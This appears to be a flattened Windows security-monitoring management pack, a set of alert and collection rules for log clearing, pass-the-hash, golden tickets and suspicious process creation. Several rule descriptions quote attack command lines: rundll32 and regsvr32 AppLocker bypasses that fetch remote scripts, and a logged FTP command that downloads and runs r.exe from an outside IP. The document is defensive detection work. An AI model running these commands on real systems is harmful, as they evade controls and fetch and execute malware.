SecurityMonitoringMP.Event.SoftwareRemovedFromServerSecurity Monitoring: Software was Removed from a ServerThis may not be a security event and is disabled by default. This could be enabled and edited to target security software in customer environments.SecurityMonitoringMP.Event.SoftwareRemovedFromServerMicrosoft.Windows.Server.OperatingSystemAlertFalse011724MsiInstallerTrueWarningNormalTrueApplication
SecurityMonitoringMP.Event.SystemLogClearedSecurity Monitoring: The system Log was clearedSecurityMonitoringMP.Event.SystemLogClearedMicrosoft.Windows.Server.OperatingSystemAlertFalse0104Microsoft-Windows-EventlogTrueErrorNormalTrueSystem
SecurityMonitoringMP.Event.SystemPoweredOffSecurity Monitoring: A system has been powered offThis is not necessarily a security event, and as such it can generate noise and is off by default. SecurityMonitoringMP.Event.SystemPoweredOffMicrosoft.Windows.Server.OperatingSystemAlertFalse01074User32TrueWarningNormalTrueSystem
SecurityMonitoringMP.Event.SystemRestartedSecurity Monitoring: A system was restartedThis is not necessarily a security event, and as such this is disabled by default, but it can be useful in tracking security events or bad business practice.SecurityMonitoringMP.Event.SystemRestartedMicrosoft.Windows.Server.OperatingSystemAlertFalse01074User32TrueWarningNormalTrueSystem
SecurityMonitoringMP.Event.UnexpectedShutdownSecurity Monitoring: Unexpected System ShutdownThis checks the system log for unexpected shutdown events and generates an alert. While not necessarily related to an attack, these events are potentially worth investigating for health reasons in the environment.SecurityMonitoringMP.Event.UnexpectedShutdownMicrosoft.Windows.Server.OperatingSystemAlertFalse00TrueWarningNormalTrueSystem
SecurityMonitoringMP.EventCollection.4672Security Monitoring Collection: Event ID 4672SecurityMonitoringMP.EventCollection.4672Microsoft.Windows.Server.OperatingSystemEventCollectionFalse00FalseTrue
SecurityMonitoringMP.EventCollection.BatchLogonSecurity Monitoring Collection: Event ID 4624 Logon Type 4SecurityMonitoringMP.EventCollection.BatchLogonMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
SecurityMonitoringMP.EventCollection.GoldenTicketSecurity Monitoring Event Collection: Event ID 4769 result 0x1FSecurityMonitoringMP.EventCollection.GoldenTicketMicrosoft.Windows.Server.DC.ComputerEventCollectionTrue00FalseTrue
SecurityMonitoringMP.EventCollection.SpecialGroupLogonSecurity Monitoring Collection: Event ID 4694SecurityMonitoringMP.EventCollection.SpecialGroupLogonMicrosoft.Windows.Server.OperatingSystemEventCollectionTrue00FalseTrue
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJavaSecurity Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass) was executedTo bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigatedSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJavaWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvrSecurity Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass using regsvr32) was execuitedAppLocker Bypass Techniques using Regsvr32.exe (greg) Note: The following is already contained in SCUBA_RULE_Applocker_Bypass Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dllSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvrWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMDSecurity Monitoring Forwarded Events: A suspicious process creation (cmd) was executedThese events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately.SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMDWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommandSecurity Monitoring Forwarded Events: A suspicious process creation (FTP script execution via echo command) was executedDetection of FTP Scripts created via the Echo command: Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware… Example of the commandline used to create and run ftp scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigatedSecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommandWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousRegSecurity Monitoring Forwarded Events: A suspicious process creation (registry) was executedThis rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear.SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousRegWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPositionSecurity Monitoring Forwarded Events: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executedSee: https://technet.microsoft.com/en-us/library/cc957410.aspx The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar Other console apps that can be modified to make the screen non-visible SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPositionWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue04688TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.CredentialSwapSecurity Monitoring Forwarded Events: Potential Credential Swap in ProgressSecurityMonitoringMP.ForwardedEvents.CredentialSwapWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeletedSecurity Monitoring Forwarded Events: Local User Created or Deleted in Administrator Security GroupSecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeletedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ProhibitedAppSecurity Monitoring Forwarded Events: Prohibited App in UseSecurityMonitoringMP.ForwardedEvents.ProhibitedAppWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue08003TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.PtHTier2Security Monitoring Forwarded Events: Possible PtH Attack in Progress Against Tier 2SecurityMonitoringMP.ForwardedEvents.PtHTier2WindowsEventCollectorDiscovery.EventLogCollectorServerAlertFalse00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SecurityLogClearedSecurity Monitoring Forwarded Events: Security log cleared on a server configured to forward eventsSecurityMonitoringMP.ForwardedEvents.SecurityLogClearedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue01102Microsoft-Windows-EventlogTrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ServiceCreationSecurity Monitoring Forwarded Events: Service Created on systemSecurityMonitoringMP.ForwardedEvents.ServiceCreationWindowsEventCollectorDiscovery.EventLogCollectorServerAlertFalse00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreatsSecurity Monitoring Forwarded Events: Service associated with a known threat was created on a forwarding computerSecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreatsWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue07045TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SpecialGroupLogonSecurity Monitoring Forwarded Events: Special Group logon eventSecurityMonitoringMP.ForwardedEvents.SpecialGroupLogonWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue00TrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.ForwardedEvents.SystemLogClearedSecurity Monitoring Forwarded Events: System Log was ClearedSecurityMonitoringMP.ForwardedEvents.SystemLogClearedWindowsEventCollectorDiscovery.EventLogCollectorServerAlertTrue0104Microsoft-Windows-EventlogTrueErrorNormalTrueForwardedEvents
SecurityMonitoringMP.GPOMonitoring.EventAndScript.RuleGPO Change Event then run correlation script RuleSecurityMonitoringMP.GPOMonitoring.EventAndScript.RuleMicrosoft.Windows.Server.DC.ComputerCustomTrue00TrueErrorNormalTrue
SecurityMonitoringMP.Pth.CredentialSwapSecurity Monitoring: Potential Credential Swap in ProgressSecurityMonitoringMP.Pth.CredentialSwapMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Pth.PtHAgainstDCSecurity Monitoring: Possible PtH attack in progress (successful) against DCSecurityMonitoringMP.Pth.PtHAgainstDCMicrosoft.Windows.Server.DC.ComputerAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.Pth.PtHAgainstTier1Security Monitoring: Possible PtH Attack in Progress against tier 1SecurityMonitoringMP.Pth.PtHAgainstTier1Microsoft.Windows.Server.OperatingSystemAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.ThreatHunt.BatchLogonInUseSecurity Monitoring Threat Hunting: Batch Logon in useThis rule checks the security log for event ID 4624 Logon Type 4. Logon type 4 is a batch logon, which essentially means that there are exposed credentials on this system. Investigation should determine which application is using said credentials. Once the applications are remediated, batch logons can be disabled, making your environment more secure.SecurityMonitoringMP.ThreatHunt.BatchLogonInUseMicrosoft.Windows.Server.OperatingSystemAlertFalse00TrueErrorNormalTrueSecurity
SecurityMonitoringMP.ThreatHunt.SpecialGroupLogonSecurity Monitoring Threat Hunting: Special Group logon eventThis rule will not generate any noise under normal environment. It requires special groups auditing turned on via GPO as well as the specific memberships to be targeted in the registry. If you've done these tasks, this monitor will alert every time a user that is a member of these SecurityMonitoringMP.ThreatHunt.SpecialGroupLogonMicrosoft.Windows.Server.OperatingSystemAlertTrue00TrueErrorNormalTrueSecurity